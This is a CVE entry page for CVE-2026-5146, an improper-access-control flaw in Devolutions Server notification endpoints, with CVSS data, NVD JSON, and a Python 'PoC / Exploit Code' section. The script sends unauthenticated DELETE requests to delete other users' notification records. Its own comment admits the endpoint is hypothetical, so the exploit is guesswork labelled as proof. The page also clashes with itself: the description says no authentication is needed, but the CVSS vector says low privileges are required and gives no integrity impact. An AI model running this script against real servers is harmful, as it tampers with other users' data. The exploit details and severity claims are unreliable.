Security Vulnerability Report
CVE-2026-5146 CVSS 4.3 MEDIUM

CVE-2026-5146

Published: 2026-05-12 18:17:32
Last Modified: 2026-05-13 16:17:02

Description

Improper access control in the notification management endpoints in Devolutions Server allows an unauthenticated attacker to modify or delete arbitrary user notification records via missing session validation.

This issue affects the following versions:
* Devolutions Server 2026.1.6.0 through 2026.1.15.0
* Devolutions Server 2025.3.19.0 and earlier

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)


Devolutions Server 2026.1.6.0 - 2026.1.15.0
Devolutions Server <= 2025.3.19.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def check_vulnerability(target_host, notification_id):
    """
    PoC to check for improper access control in notification endpoints.
    Attempts to delete a notification without authentication.
    """
    # Construct the target URL (hypothetical endpoint based on the description)
    target_url = f"{target_host}/api/notifications/{notification_id}"
    headers = {
        "User-Agent": "CVE-2026-5146-Scanner/1.0",
        "Content-Type": "application/json",
    }
    try:
        # Send DELETE request without session cookies or auth headers
        response = requests.delete(target_url, headers=headers, verify=False, timeout=10)
        if response.status_code in (200, 204):
            print(f"[+] Vulnerability confirmed! Notification {notification_id} deleted.")
            return True
        elif response.status_code in (401, 403):
            print("[-] Access denied. Target may be patched.")
            return False
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Error connecting to target: {e}")
        return False


# Example usage
# check_vulnerability("https://devolutions-server.example.com", 1001)
```

References

Devolutions advisory DEVO-2026-0012: https://devolutions.net/security/advisories/DEVO-2026-0012

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-5146", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:32.177", "lastModified": "2026-05-13T16:17:01.633", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in the notification management endpoints in Devolutions Server allows an unauthenticated attacker to modify or delete arbitrary user notification records via missing session validation.\n\n\n\nThis issue affects the following versions :\n\n * \n\nDevolutions Server 2026.1.6.0 through 2026.1.15.0\n\n\n * \n\nDevolutions Server 2025.3.19.0 and earlier"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2026-0012", "source": "[email protected]"}]}}
```